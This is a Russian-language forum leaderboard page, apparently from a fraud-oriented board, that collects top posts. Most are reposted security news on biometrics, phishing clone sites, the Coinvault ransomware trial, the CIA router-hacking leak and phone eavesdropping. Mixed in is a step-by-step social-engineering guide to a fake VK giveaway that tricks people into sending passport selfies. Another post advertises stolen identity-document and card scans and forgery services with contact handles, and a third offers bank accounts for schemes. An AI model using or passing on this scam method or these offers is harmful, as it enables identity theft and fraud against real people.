Таблица лидеров
-
в Сообщения
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 10 сентября 2025
-
Год
10 сентября 2024 - 10 сентября 2025
-
Месяц
10 августа 2025 - 10 сентября 2025
-
Неделя
3 сентября 2025 - 10 сентября 2025
-
Сегодня
10 сентября 2025
-
Пользовательская дата
18.02.2023 - 18.02.2023
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 18.02.2023 в Сообщения
-
2 баллаЕсли вы пользуетесь смартфоном, то, скорее всего, уже представляете, что такое биометрические данные и как они могут облегчить жизнь. Устройства многих производителей давно научились распознавать своих владельцев по отпечаткам пальцев, а последним моделям не нужно даже этого — им достаточно «увидеть» ваше лицо. Уже скоро с помощью подобных методов распознавания личности мы сможем взять кредит в банке, получить консультацию врача или персональную скидку в магазине. Мы предлагаем разобраться в том, когда пригодятся биометрические данные. Когда соберетесь лететь за границу Многие страны, в том числе и Россия, уже сейчас собирают биометрические данные своих граждан и привязывают их к загранпаспортам. На чипы в таких документах можно записывать самую разную биометрическую информацию: от фотографии владельца до изображения радужки его глаз или отпечатков пальцев. Пока что эти данные используются в основном для безопасности: информацию, зашитую в чип, подделать крайне сложно, а ее проверка на границе занимает гораздо меньше времени (и паспортный контроль пассажиры проходят быстрее). С другой стороны, уже в ближайшем будущем биометрической информации будет достаточно, чтобы пассажиры проходили контроль вообще без документов, подтверждая свою личность отпечатками, звучанием голоса и изображением лица. Когда решите открыть счет в банке Сейчас, чтобы открыть или закрыть счет в банке, получить кредит или перевести крупную сумму, вам, скорее всего, придется ехать в отделение. Но биометрия скоро может это изменить: в России запускается Единая биометрическая система — общая база данных с биометрической информацией о гражданах. С ее помощью подтвердить свою личность и получить некоторые услуги в банке можно будет удаленно: достаточно записать видео, куда попадет ваше лицо, и аудио — с голосом. Сейчас база пополняется. То есть стоять в банковских очередях в ближайшем будущем, скорее всего, уже не придется. Когда понадобятся услуги от государства Единая биометрическая система будет использоваться не только в банках. Получать госуслуги теперь тоже станет проще. В течение трех лет система заработает и для них, и получить любую услугу, для которой сегодня нужно приехать в МФЦ, тоже можно будет откуда угодно, без паспорта и бумажных документов. Особенную роль использование биометрических данных сыграет для пенсионеров, маломобильных людей и жителей отдаленных населенных пунктов. Когда придется пойти к врачу Биометрические данные смогут стать заменой медицинским картам в больницах. Записаться на прием можно будет удаленно, а уже непосредственно на приеме врач получит историю болезни из электронной базы. Эти же биометрические данные могут пригодиться и в телемедицине: обратившись к врачу через интернет-платформу, пациент не должен будет вспоминать, какие анализы он сделал и к каким врачам сходил. Доступ ко всей этой информации специалист получит автоматически: система откроет врачу доступ к электронной карте пациента, с которым он разговаривает. Когда надоест менять пароли В идеальном мире в каждой учетной записи, сколько бы у вас их ни было, должен быть свой пароль. Он должен быть длинным, включать цифры и буквы разного регистра, а еще лучше менять его каждые несколько месяцев. Задача почти непосильная — многие годами используют одни и те же пароли для множества разных аккаунтов. Биометрия позволит обезопасить свои аккаунты гораздо более простым, но не менее надежным способом: запись голоса и изображение лица помогут входить в почту или соцсети так же просто, как разблокировать смартфон. Когда опять забудете пропуск или потеряете ключи Биометрические данные для прохода в рабочие помещения используются уже достаточно давно, но чаще в особо охраняемых зонах, куда попасть можно, только приложив к сканеру ладонь и показав камере радужную оболочку глаза. Вы все это видели в шпионских фильмах. В недалеком будущем такие системы могут быть установлены в любом офисном здании: камера у турникетов определит, что на работу пришли именно вы, и система безопасности автоматически откроет вам проход. Точно так же можно будет попасть и в свою квартиру: камера определит, что пришел владелец, и «умная дверь» откроется автоматически. Когда у вас украдут смартфон или угонят машину Представьте: вы стоите у дверей в метро и читаете новости. На очередной остановке прямо перед отправлением кто-то выхватывает у вас смартфон и убегает. Двери закрываются. Найти злоумышленника в такой ситуации довольно непростая задача — по крайней мере без использования биометрии. Если в городе установлены системы распознавания лиц, то определить, кто именно вас обокрал или, например, угнал вашу машину с парковки, становится гораздо проще. У таких систем есть и обратная сторона — заметное снижение уровня приватности. В миниатюре подобный опыт уже воплощен в Сингапуре и позволяет оценить как плюсы, так и минусы. Когда у вас не будет никаких документов Если понадобится подтвердить личность и у вас на руках не окажется никаких документов, национальная база с биометрическими данными сможет помочь. Обычно, если вы потеряли паспорт и у вас нет других удостоверяющих личность документов, восстановить его — очень длительный и трудоемкий процесс, часть которого состоит в том, чтобы доказать, что вы — это действительно вы. Если же информация о вас будет добавлена в Единую биометрическую систему, то этот процесс станет проще: подтвердить личность можно будет просто предоставив отпечатки пальцев или аудиообразец голоса. Принимает, хранит и обрабатывает данные Единой биометрической системы компания «Ростелеком». Здесь же создается специальный контрольный шаблон, который будут использовать банки, для удаленной идентификации клиентов. Когда в следующий раз отправитесь за покупками Магазины учатся обращаться с биометрией на пользу покупателям: расплатиться за покупки можно будет приложив палец к специальному терминалу со встроенным биометрическим сканером. Сегодня уже можно оплатить покупки при помощи смартфона: списание денег происходит после того, как вы подтвердите платеж отпечатком пальца. Использование биометрии напрямую, без посредника, позволит ритейлерам запоминать своих постоянных клиентов и их предпочтения в покупках, а потом — подсказывать, на какой товар каждому из них стоит обратить внимание, и формировать для каждого покупателя индивидуальные скидки. Когда захотите пойти на футбольный матч Распознавание лиц уже сегодня применяют, чтобы события с большим скоплением людей проходили безопаснее. Так, чтобы не допускать на футбольные матчи агрессивных болельщиков, используют системы идентификации по лицу: людей, попавших на записи с камер на входе в стадион, сравнивают с базой «дебоширов», которые уже устраивали беспорядки на играх. С помощью такой системы распознавания лиц уже ловили преступников, находящихся в федеральном розыске.
-
1 баллСпециалисты предупреждают о повышении мошеннической активности в связи с «черной пятницей». Эксперты Group-IB обнаружили более 400 сайтов-клонов, копирующих популярную торговую площадку AliExpress, и еще две сотни сайтов, маскирующихся под известные бренды и интернет-магазины. Целью подобных мошеннических ресурсов может быть как реализация контрафактных товаров, так и кража денег или данных банковских карт пользователей. 23 ноября стартует «черная пятница» — масштабная распродажа, с которой в США и в Европе начинается традиционный сезон рождественских скидок. В последние годы ажиотаж наблюдается не только в магазинах, где за товарами со скидками 50%-80% выстраиваются огромные очереди, но и в интернете. Только с 7 по 21 ноября Group-IB зафиксировала более 120 000 публикаций с упоминаниями этой акции в социальных сетях (97%) и на других веб-площадках (3%). Реклама «черной пятницы» появляется в социальных сетях, в постах у топовых блогеров и на самих торговых площадках. AliExpress и 400 разбойников Подобным потребительским бумом (солидные скидки действуют лишь ограниченное количество времени) активно пользуются мошенники. Они заранее создают сайты-клоны известных брендов и интернет-магазинов. Например, специалисты Group-IB обнаружили около 400 ресурсов, копирующих популярную торговую интернет-площадку AliExpress. Для привлечения внимания покупателей злоумышленники копировали сайт интернет-магазина, бренд, логотипы и фирменные цвета и регистрировали похожее доменное имя. Большинство изученных подозрительных ресурсов содержали в доменном имени различные варианты официального названия AliExpress. Ущерб для одного покупателя может достигать десятков тысяч рублей. Ежемесячно на один подобный сайт может заходить до 200 000 человек. Масштабы такой преступной деятельности огромны. Число ресурсов, запущенных одной группой мошенников, может достигать нескольких сотен. Незадолго до «черной пятницы» команда Brand Protection выявила крупную сеть подобных сайтов — 198 штук, незаконно использующих товарные знаки и бренды известных марок. Большая часть доменных имен была куплена в конце августа 2018 года и практически весь контент — фотографии товаров, их описание и цены были скопированы с официальных ресурсов. Примечательно, что все эти ресурсы имели одного и того же хостинг-провайдера — ISPIRIA Networks Ltd, находящегося в Белизе (Центральная Америка). Целью таких сайтов-клонов может быть как реклама и продвижение собственных товаров, так и реализация контрафакта. По данным Group-IB, объем онлайн-рынка торговли контрафактной продукцией в России за год вырос на 23% и составил свыше 100 млрд рублей в 2017 году, по сравнению с 81 млрд в 2016 году. Мошенники продают на своих ресурсах бытовую и компьютерную технику, одежду и обувь, ювелирные изделия, аксессуары, косметику, медицинские препараты и многое другое, зачастую с огромной скидкой — до 80%. По статистике Group-IB, каждый 5 поддельный товар был куплен в интернете, в среднем россияне на покупку контрафактной продукции тратит 5 300 рублей. Случается, что мошенники продают несуществующие товары. Например, предлагают версию игры «Red Dead Redemption 2» на ПК, несмотря на то, что игра вышла только на PlayStation 4 и Xbox One. Торжество фишинга: 1274 атаки в день Кроме того, особую опасность для покупателей представляю ресурсы, созданные злоумышленниками для кражи денег или данных (логинов, паролей, банковских карт), речь идет о фишинговых сайтах. По данным экспертов Group-IB Brand Protection, ежедневно фиксируется 1274 фишинговых атак. Всего выручка фишинговых ресурсов, использующих бренды известных компаний, в среднем за месяц работы составляет 3 млн рублей, а посетителями таких сайтов ежемесячно становятся около 200 тыс. человек. Мошенники используют те же каналы продвижения, что и легальные ресурсы: рассылку в мессенджерах, баннерную рекламу, поисковую оптимизацию (SEO) и продвижение в социальных сетях. Злоумышленники нередко, покупают домен очень схожий с оригинальными, настраивают на нем редирект и раскручивают эту ссылку. Перейдя по такой ссылке, пользователь оказывается на странице с совершенно другим адресом. «Последствиями подобного мошенничества могут быть как прямые финансовые потери, так и косвенные, в частности, репутационные. По статистике, 64% пользователей перестают покупать продукцию компании после негативного опыта. В разрезе информационной безопасности подобные ресурсы-клоны должны рассматриваться как угрозы не только пользователям, но и самой компании. Для крупных брендов работа по выявлению мошеннических сайтов должна иметь регулярный и систематический характер», — говорит Андрей Бусаргин, директор департамента инновационной защиты бренда и интеллектуальной собственности Group-IB.
-
1 баллКак-то раз мне понадобились такие документы, не просто сканы, а именно селфи. В моём случае для БК. В голову лезли различные мысли, такие как: добыча через рассылку по почте сообщений от имени официальных лиц и т.д. Это всё не то, я больше хотел найти способ по соц. сетям. И тут мне что-то ударило в голову и пришла одна мысля. Вот собственно способ: Что потребуется? - Группа в ВК на 200-1000 подписчиков - Левая страничка ВК, на левую сим и т.д. - Не забываем шифроваться (VPN, дедик, противозачаточные и т.д.) Step 1 Создаём группу ВК. Пусть будет группа под названием "Барахолка Мухосрань". Оживляем немножко группу, потратим на неё недельку - полторы на оживление. Step 2 Мутим розыгрыш репостов с датой +- 10 дней. Если сегодня 20 число, то итог 1 числа след. месяца. Ну, не слишком далёкую дату.Ставим какой-нибудь жирный приз, типа 10.000 рублей. Делаем фотку с купюрами и сигной с линкой на нашу группу. Такой пост будет разлетаться минимум в 100-200 репостов. А это, потенциальные 100-200 сканов. Step 3 Далее, настаёт день розыгрыша. И мы тупо пишем каждому из репостнувших, что именно он победитель. Но, здесь уже начинаем подрубать свои навыки СИ и говорим примерно такой текст: - "Добрый день Мамонт Мамонтов! Хочу вас оповестить о том, что именно вы стали победителем нашего розыгрыша 10.000 рублей! Прошу вас ответить мне в скором времени, для того чтобы я смог обсудить с вами детали" Далее мамонт пишет вам что-то вроде: - "Здорово! Я так счастлив! Что нужно сделать чтобы получить свой приз?". Пишем ему отвлекающий текст, мол никаких предоплат и т.д. вам делать не нужно, я перечислю вам всё на карту. Вам нужно лишь выслать подтверждение того, что страница действительно является вашей. Мамонт спросит, но как же ему это сделать? Тут подводим диалог к тому, что нужно выслать фото с паспортом. Получаем Profit в 80% случаев.
-
1 баллШифровальщик Coinvault бесчинствовал в 2014-2015 годах в десятках стран по всему миру. Число его жертв, по подсчетам наших экспертов, составляет более десяти тысяч человек. За всем этим стоят два брата — голландцы 21 и 25 лет, разработавшие и распространявшие троян. С каждой жертвы они требовали по 1 биткойну, курс которого в то время составлял около 200 евро. В результате им удалось собрать порядка 20 тысяч евро на двоих. Coinvault примечателен тем, что в нем в дополнение к собственно шифрованию появились другие функции, которые мы и сегодня видим в троянах-вымогателях. Например, жертве дают возможность бесплатно расшифровать один файл. Это на руку преступникам — когда понимаешь, что от возвращения твоей информации тебя отделяет только один клик, соблазн заплатить вымогателям становится сильнее. Висящий на экране таймер, еще одна психологическая находка создателей Coinvault, неумолимо отсчитывает время до увеличения выкупа. Голландский след в коде Coinvault Авторы зловреда приложили немало сил, чтобы скрыть его от защитных решений и затруднить его анализ. Вымогатель умеет определять, например, не пытаются ли его запустить в «песочнице» — и в этом случае ничего не делать, а его код довольно тщательно обфусцирован. В контексте кибербезопасности “песочница” представляет собой строго контролируемую среду, в которой подозрительные программы или сценарии могут безопасно выполняться. Обфускация — процесс изменения кода программы, в результате которого он приобретает вид, трудный для понимания – при этом программа сохраняет свои функции. Впрочем, экспертам все же удалось добраться до исходного кода и найти в нем зацепку, которая в итоге помогла поймать преступников, — несколько комментариев на голландском языке. Он не так уж популярен среди вирусописателей, поэтому с большой уверенностью можно было предположить, что зловред родом из Нидерландов. Исследователи передали информацию голландским киберполицейским, и через несколько месяцев они смогли отчитаться об успешной поимке организаторов кампании. Явление третье: те же и Фемида Полиция собрала почти 1300 заявлений от жертв вымогателя. Некоторые пострадавшие появились в суде, чтобы лично потребовать компенсацию. Например, одному из них шифровальщик сорвал отпуск. Ущерб потерпевший оценил в 5 тысяч евро, на которые, по его словам, он смог бы все-таки поехать отдохнуть. Еще одна жертва попросила вернуть выкуп так, как он был заплачен — в биткойнах. За прошедшее время курс криптовалюты поднялся почти в 30 раз, так что если суд удовлетворит ходатайство, это будет первый случай, когда на атаке вымогателя заработала пострадавшая сторона. На прошедшем заседании представители обвинения потребовали наказания в виде трех месяцев в тюрьме с последующим девятимесячным условным сроком и 240 часами общественных работ. Адвокаты просят суд не отправлять братьев за решетку, аргументируя ходатайство тем, что подсудимые сотрудничали со следствием, а также тем, что один из них незаменим на своей нынешней работе, а второй учится в университете. Приговор станет известен на следующем заседании, 26 июля. Мораль: злоумышленники не останутся безнаказанными Мы всегда говорим, что идти на поводу у преступников — значит поощрять их. Суд над создателями Coinvault показывает, что даже якобы анонимные злодеи киберпространства не избегают наказания. Но лучше все-таки не ждать правосудия три года, а защититься от атак заранее и самостоятельно. Напоминаем стандартные советы: Не кликайте по подозрительным ссылкам и не открывайте подозрительные вложения в письмах. Регулярно делайте резервные копии файлов. Используйте надежное защитное решение.
-
1 баллЗдравствуйте! Есть счета в банках Европы( разные страны) открытые на физических лиц, могу открыть в конкретной стране, если это будет необходимо. Скажите, что можно с этими счетами провернуть? если у кого-то есть идеи или готов посотрудничать просьба написать в Telegram - @MaxAndreev01 (https://t.me/MaxAndreev01)Заранее благодарю за ответ!
-
1 баллНикого уже не удивляет, когда после запросов в Google контекстная реклама еще несколько дней надоедает результатами поиска. Но что, если вы просто поговорили с приятелем о чем-то лично, а завтра в Facebook появится реклама о предмете вашего разговора? Кто-то шпионит за вами или это просто совпадение? Сэм Николс специально для Vice провел эксперимент со своим смартфоном и выяснил, что телефоны не только подслушивают за нами, но еще и сливают информацию крупным компаниям. Представляем Вашему вниманию перевод статьи, чтобы и вы знали, о чем можно и нельзя говорить рядом со своим смартфоном. Facebook знает, как распорядиться вашими данными Пару лет назад случилось нечто странное. Мы с другом сидели в баре, у каждого в кармане — iPhone. Болтали о недавней поездке в Японию, о том как хотели бы вернуться назад. И буквально на следующий день оба обнаружили в наших профилях Facebook всплывающие окна с рекламой дешевых билетов в Токио. Мы могли бы расценить это как дикую случайность, если бы не тот факт, что каждый владелец смартфона сталкивался с подобной ситуацией. Так что же это — паранойя или наши мобильные устройства действительно нас подслушивают? По мнению старшего консультанта по вопросам кибербезопасности компании Asterisk, бывшего лектора и научного сотрудника университета Edith Cowan University доктора Питера Ханнея, нас действительно подслушивают, но, это не так ужасно, как может показаться. Чтобы заставить мобильный телефон записывать разговоры, необходимы ключевые слова, такие как «Эй, Siri» или «Ok, Google». Если такие слова-команды не произносятся, то любые аудиоданные, поступающие от владельца смартфона остаются внутри устройства. И было бы не о чем беспокоиться, если бы не тот факт, что эта «внутренняя информация» доступна любому приложению установленному на смартфоне, тому же Facebook, например. При этом, то как эти приложения распорядятся этой информацией, в действительности зависит только от них. «Время от времени обрывки аудиообстановки должны поступать на серверы приложений (таких как Facebook), но условия, при которых это происходит, пользователям не разглашаются», — объясняет Питер. «Это может происходить с некой периодичностью, в привязке к местонахождению абонента либо в соответствии с каким-либо иным алгоритмом. Но в любом случае приложения наверняка получают разрешение на доступ к микрофону и делают это постоянно через определенные промежутки времени. Все программные команды внутри приложения проходят в зашифрованном виде, так что определить условия их подключения и понять алгоритм доступа к микрофону очень трудно». Одним из самых распространенных видов «слежки» со стороны смартфонов за их владельцами является сбор данных о местоположении. GPS-модуль регулярно следит за геолокацией и сохраняет маршруты, по которым перемещаются люди в специальном журнале. Владелец смартфона сам соглашается с сохранением этих данных, принимая условия пользовательского соглашения. Компании Apple и Google уверены, что это необходимо для работы их сервисов: погодные сводки, маршруты, поиск ближайших кафе и пр. Несмотря на то, что компании утверждают об анонимном использовании данных, многие уверены — это вмешательство в личную жизнь. Правда, и прекратить такой «шпионаж» достаточно легко. Переключатель «Часто посещаемые места» в разделе с этим же названием в iOS поможет выключить сбор данных, а «Очистить историю» удалит все ранее сохраненные данные. В Android есть переключатель в разделе «История местоположений». Стираются данные кнопкой «Удалить историю местоположений». Такие приложения, как Facebook или Instagram, теоретически могут быть запрограммированы на тысячи ключевых слов. Банальная болтовня с другом о необходимости покупки новых джинс потенциально могла бы спровоцировать реакцию на определенное слово и активизировать соответствующую команду. Это возможно в теории, но несмотря на технологические возможности, компании подобные Facebook категорически отрицают факт прослушивания ваших разговоров. «Исходя из того, насколько открыт в этом вопросе Google, лично я бы предположил, что другие компании делают ровно то же самое», — продолжает Питер. «На самом деле им нет смысла этим не заниматься. Это — полезный инструмент для изучения рынка. К тому же это не запрещено условиями договора с конечными пользователями их услуг и не противоречит закону. Так что, я бы предположил, что они используют эти возможности, но быть в этом уверенным до конца нельзя». «Реклама после моих разговоров повергла меня в шок» Поверив словам Питера, я решил провести эксперимент. Дважды в день в течении пяти суток я повторял набор фраз, которые теоретически могли бы содержать ключевые слова, способные активировать соответствующие команды в приложениях моего телефона. Использовались фразы типа «я подумываю о возвращении в университет» и «мне нужно несколько дешевых рубашек для работы». Я внимательно отслеживал любые изменения в постах, появляющихся при использовании моего Facebook. Изменения я ощутил буквально сразу же. Не успел я опомниться, как мне вдруг начали предлагать пройти курсы в различных университетах, а определенные производители одежды стали предлагать дешевые вещи. Частный разговор с другом о том, что у меня может закончиться интернет-трафик, закончился рекламой дешевых тарифных планов с возможностью использования 20 Гб трафика в месяц. И не смотря на то, что все эти предложения были выгодными, сам факт происходящего поверг меня в шок и вызвал абсолютный ужас. Питер пояснил, что нет таких данных, сохранность которых была бы гарантирована навсегда. Он убедил меня в том, что, по состоянию на 2018 год, ни одна компания не продает имеющуюся в своем распоряжении информацию напрямую рекламодателям. Но, как мы все знаем, рекламодатель хочет не информацию о нас как таковую, он хочет, чтобы мы смотрели его рекламу. «Вместо того, чтобы указать на тех, кто отслеживает вас, они просят вас заплатить им за то, чтобы они не сливали вашу информацию заинтересованной стороне. Если они будут сливать ее всем подряд, то потеряют к ней эксклюзивный доступ. Так что они пытаются держать ее в секрете на сколько это возможно». Наши разговоры могут быть использованы против нас Питер также отметил, что обеспечение сохранности наших данных со стороны IT-компании вовсе не гарантирует их недоступность государственным органам. Большинство IT-компаний расположены на территории США. Исходя из этого, Агентство национальной безопасности или, возможно, ЦРУ могут иметь доступ к информации вне зависимости от того, является ли это законным в стране фактического пребывания человека или нет. Так что, отвечая на изначально поставленный вопрос, можно ответить «да»: наши телефоны слушают нас, и все то, о чем мы говорим рядом с нашими мобильниками, потенциально может быть использовано против нас. Однако, если верить Питеру, это не то, чего большинству людей следовало бы опасаться. Некоммерческая организация ProPublica исследует достаточно новое явление в интернете — дискриминация и предвзятое отношение корпораций к людям. Раса пока не указывается в явном виде в Facebook, однако этническую принадлежность легко определить по «лайкам» и подпискам. В результате от пользователя скрывается определенная информация: например, объявления об аренде жилья или вакансии. Этот тип таргетированной рекламы отличается от традиционной рекламы в печатных СМИ или на телевидении. Фактически, в интернете можно полностью исключить доступ человека к определенной информации, и он никогда об этом не узнает. Просто потому что он «нежелательной расы или пола». Если вы не журналист, не адвокат и не являетесь носителем секретной информации, то ваши данные достаются исключительно рекламодателям. Если вы, как любой другой человек, живете нормальной жизнью и говорите с друзьями о полете в Японию, то нет ничего удивительного в том, что рекламодатели просматривают историю вашего веб-поиска. «Это всего лишь развитие того, что из себя представлял рекламный бизнес на телевидении», — уверяет Питер. «Только вместо отслеживания пикового времени аудитории сейчас мы анализируем активность интернет-пользователей. Это не идеальный маркетинговый ход, но я не думаю, что это представляет прямую угрозу для большинства людей».
-
1 балл
-
1 балл
-
1 балл
-
1 баллВ современных реалиях обычные пользователи могут подвергаться слежке не только со стороны хакеров, а и со стороны служб государственной безопасности. Благодаря очередной утечке документов ЦРУ, опубликованной на WikiLeaks, общественности стал известен еще один способ слежки за пользователями, к которому прибегают спецслужбы в своих расследованиях. Многих пользователей может шокировать то, что обычный роутер, который у большинства людей после покупки пылится в укромном уголке квартиры, при использовании определенного программного обеспечения становится инструментом для слежки. С помощью специального инструментария агенты ЦРУ могут отслеживать ваш трафик, активность в сети, и даже получить доступ к вашему ПК и мобильным девайсам. Согласно опубликованным данным, набор эксплоитов для взлома роутеров называется CherryBlossom и содержит различные программы для поиска уязвимостей и удаленной слежки за устройствами индивида, который подвергся взлому. Инструментарий рассчитан на использование слабых мест в прошивке роутеров таких общеизвестных компаний как D-Link и Linksys. С его помощью у ЦРУ есть возможность подбирать пароли и в последствии переписывать прошивку устройств для дальнейшего шпионажа. Сложность также заключается в том, что в отличие от прямого взлома ПК или мобильного устройства пользователя, когда следы взлома могут быть заметны, получение доступа третьих лиц к роутеру очень сложно определить. Поэтому такой способ шпионажа более эффективен ввиду его скрытности. Связь со всемирной сетью работает, доступ в Интернет есть, а пользователь не подозревает о ведущейся за ним слежке. «У пользователя попросту не возникает подозрений в том, что его роутер может быть взломан. Вы получаете доступ к сети как обычно» — комментирует ситуацию основатель фирмы Hacker House и специалист по вопросам безопасности, Мэттью Хайки — «Единственное отличие в том, что вся ваша активность отслеживаются в ЦРУ». Процедура взлома, описанная в документации состоит из нескольких этапов: Запуск инструмента под названием Claymore для сканирования сети и определения модели роутера с последующим запуском эксплоитов для взлома. Запуск эксплоитов под названием Tomato и Surfside. Функционал Tomato заключается в краже административных паролей, в то время как специализация Surfside не уточняется. В документе также описано лишь предназначение эксплоитов, без описания принципов их работы. Однако эксперты полагают, что уязвимость может заключаться в нарушении протокола UPNP, отвечающего за безопасность. Следом за взломом происходит установка инструмента для мониторинга активности в интернете, который называется Flytrap. Этот инструмент отправляет в ЦРУ данные о трафике, посещенных пользователем сайтов и общей активности в сети. По такой же схеме работает и CherryTree — эксплоит с браузерным интерфейсом, с помощью которого может совершаться контроль над сетью цели. Слитые файлы датированы началом 2016 года и неизвестно, существуют ли описанные в документах уязвимости в роутерах более позднего выпуска. Известно также, что уязвимости в прошивках роутера могут быть закрыты патчами компаний-производителей. Но как часто обычный пользователь интересуется прошивкой своего роутера? Пока есть стабильный доступ в интернет, нет причин заниматься изучением возможных проблем, и уязвимости могут сохраняться годами. Таким образом неосведомленность среднестатистического пользователя о подобных возможностях хакеров и спецслужб стала серьезной уязвимостью для информационной безопасности. Однако благодаря данному сливу и освещению проблемы в СМИ все может измениться. Если вы дорожите своей безопасностью в сети, после прочтения этой статьи в первую очередь стоит зайти на сайт производителя вашего роутера, найти последнюю доступную версию прошивки и обновить роутер, закрыв таким образом доступные уязвимости.
-
1 баллLOL вот так постарался , сколько же должно быть опыта за плечами , что бы написать статью хоть немного похожую на твою
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 баллКонопля неспроста была одним из культовых растений в хиппи-культуре, провозгласившей девиз "Make love, not war". Анестетический эффект каннабиса, в противоположность алкоголю, не распространяется на приятные ощущения и не мешает потенции. Причина в том, что под действием каннабиса активнее выделяется окситоцин - если, конечно, ситуация каким-то образом располагает к интимной близости. Окситоцин - гормон, связанный за особое состоянием снижения страха и чувства доверия к ближнем. возникающее при занятиях сексом. Связан также с мышечными сокращениями матки и женским оргазмом. Производится гипоталамусом, выделяется в кровь из гипофиза. На западе всё популярнее становятся лубриканты домашнего употребления: соцветия каннабиса вымачиваются в горячем кокосовом масле, затем уже остывшее масло используется как натуральный и приятный лубрикант, оказывающий потрясное влияние на ваше восприятие в тех участках тела, на которое традиционно наносятся лубриканты. Если же каннабиноиды предполагается по старинке курить, то как и музыкальное сопровождение, сорт конопли к занятиям практической любовью нужно подбирать с учётом всех тонкостей вашего темперамента и обстановки. Разумеется, лучше всего курить вместе и непосредственно в постели - внимание человека под каннабисом по-детски непосредственно и потому непредсказуемо, и когда трава подействует на полную, вы можете и не справиться с соблазнением, если не заняться им заранее. Перейдём от приятного к приятному, разновидностям каннабиса. Сатива: главное плавность Сатива склонна тонизировать, улучшать настроение и сподвигать на активную деятельность. Она также лучше усиливает прилив крови и обостряет чувства сильнее, чем индика - попробуйте, к примеру, потереться о свою любимую под хмелем Pablo Escobar или White Widow, AK-47XL от Divine Seeds. Однако способность сативы вызывать у скованных и застенчивых людей приступы паранойи может помешать вашему взаимодействию. Употреблять сативу вместе со своей девушкой непосредственно перед сексом гарантированно не испортит процесса, если вы давно вместе практикуете оба конкретных действия. С девушкой, которую вы только начинаете узнавать поближе, чисто сативные соцветия могут и заморозить немного. Если чувствуете, что обламываетесь - не стесняйтесь сказать об этом, сменить темп. Обнимитесь, полежите вместе, и всё сложится само собой. Индика и тантра Успокоительное действие индики помогает гиперактивным людям несколько замедлится и "остановить мгновение". Главное, не перекурить настолько, чтобы кто-нибудь из участников тандема отяжелел и не смог двигаться или вообще уснул. Не стоит также упускать из виду ослабленное кровообращение под stone-эффектом - почти никогда не препятствует эрекции, но в слишком затянувшейся сцене может её на некоторое время приостановить. Если это случилось, главное не падать духом - девушки вовсе не судят человека по тому, нужна ли ему иногда пауза в сексе. Выпейте вместе кофе с шоколадкой. Побудьте романтичным, пообнимайтесь. Продолжайте, когда захочется, ведь вы не пьяны - либидо в перерывах восстанавливается само собой. Чистая индика - интересный вариант для тантрического секса, для замедления всех ритмов и растворения в любви попробуйте сорт вроде Auto Kabul или Auto Candy от Divine Seeds, Afghani Bullet того же сидбанка. Путь золотой середины Умный человек, когда дует ветер, строит не щит от него, а ветряную мельницу. Когда дует шишки - старается применить состояние на пользу, а не вхолостую. Идеальные соцветия для полнометражного свидания - средней убойности гибриды с преобладанием сативы вроде Auto Big Demon от Divine Seeds или, например, для более тяжеловесных курильщиков Opium от того же сидбанка, Auto Gagarin от Bob Marley Seeds. Если вы вдруг застеснялись, лучше об этом сказать и вместе посмеяться. Главное, из смущения не накуривать девушку сильнее себя в надежде этим помочь своей уверенности, и самому причащаться умеренно. Лучше всего курить поровну.
-
1 баллПродажа и перерисовка сканов паспортов всего мира!!! База содержит большое количество сканов,кредиток,банков многих стран мира (Европа, РФ,США, СНГ, Азия и т.д.) Комплекты по Рф, Европе,снг в большом количестве Комплекты которые я предлагаю по Европе и Миру скан+statement скан+id загран + id ssn скан +driver license + билы скан+вод.удостоверение скан+кредитка скан+фото в руках и многое другое Комплекты которые я предлагаю по Рф узнаем по указаным контактам Все сканы реал -продаются в одни руки после купли вашь скан удаляется с базы . Высокое качество сканов, также много различных документов+ комплект Возможна составление нужного вам комплекта . Также возможно выборка сканов по критериям и комплектам Также возможна найти по ФИО Нужный вам паспорт Также возможна найти по максимальному комплекту документов на определенную компанию любой страны мира. Также возможна услуга перерисовки Любых документов Перерисовка более - 100 стран, сканов ,документов,Кредиток,водительских удостоверений. Работает сервис "НОТАРИУС" заверим любые ваши документы с проводкой по базе. Оптовиками частным покупателям скидка Перед продажей показываю скан в зарисованном виде Возможно выбрать скан по вашим критериям Наши контакты ICQ для связи 4-170-84 Jabber praht@jabber.ru skype Praht_11 Telegram @PraTTT email prahtpraxt@yandex.ru
-
1 баллПожалуйста, не покупайте умные замки. Мы все любим покупать новейшую и самую лучшую игрушку. Приятно получать современные и новые функции продукта, которые были скучными и предсказуемыми; завлекаловка оригинального BeBox (среди многих) была «мигающие маячки»(мигалки) с внешней стороны. Но иногда, последняя особенность не всегда является самой хорошей особенностью. А иногда, некоторые вещи не должны появляется в интернете вообще. Крутая новая вещь. Недавно Amazon анонсировала новую услугу, объединяющую смарт замки, камеру безопасности- подключенная к сети, и сеть поставщиков домашних услуг, которые работают совместно, чтобы обеспечить удаленный доступ к вашему дому. Не обращая внимания на вопрос о предоставлении сторонним подрядчикам, проверенным неопубликованными стандартными неконтролируемыми доступами, давайте взглянем на то, почему смарт замки не является самой хорошей покупкой. Как показано здесь: https://www.amazon.com/gp/product/B00KCYQGXE/ref=s9_acss_bw_cg_ODSBRLS_md2_w?pf_rd_m=ATVPDKIKX0DER&pf_rd_s=merchandised-search-2&pf_rd_r=KK66F86CM9PA0EFJZNTG&pf_rd_t=101&pf_rd_p=74cce967-6b08-4a4b-be85-c1a16f003f96&pf_rd_i=17285120011 программа Amazon фактически работает с тремя различными существующими продуктами для смарт-замков «Смарт замок» - это довольно сложный термин, охватывающий широкий спектр технологических новшеств, и от чего же зависит устройство замка Amazon, какие уязвимости безопасности включают эти технологии? Это малая загадка, так как на странице продажи Amazon не включена эта информация, также нет страницы «технических особенностей» одного из производителей. Мы можем предположить, что для этих замков потребуются сменные батареи, и по крайней мере один из замков предоставит пользователю Wi-Fi доступ. Когда мы разрешили дистанционную разблокировку в вашем доме без какой-либо личной проверки подлинности явно - это плохая идея и, ряд других смарт замков пытались осуществить более безопасный подход с использованием низкой энергии Bluetooth, что дает некоторые дополнительные функции безопасности, которых нет в исходном протоколе. К сожалению, в то время как, сам протокол имеет в целом хороший профиль безопасности, выполнение и связанные сопутствующие приложения, выпущенные производителями 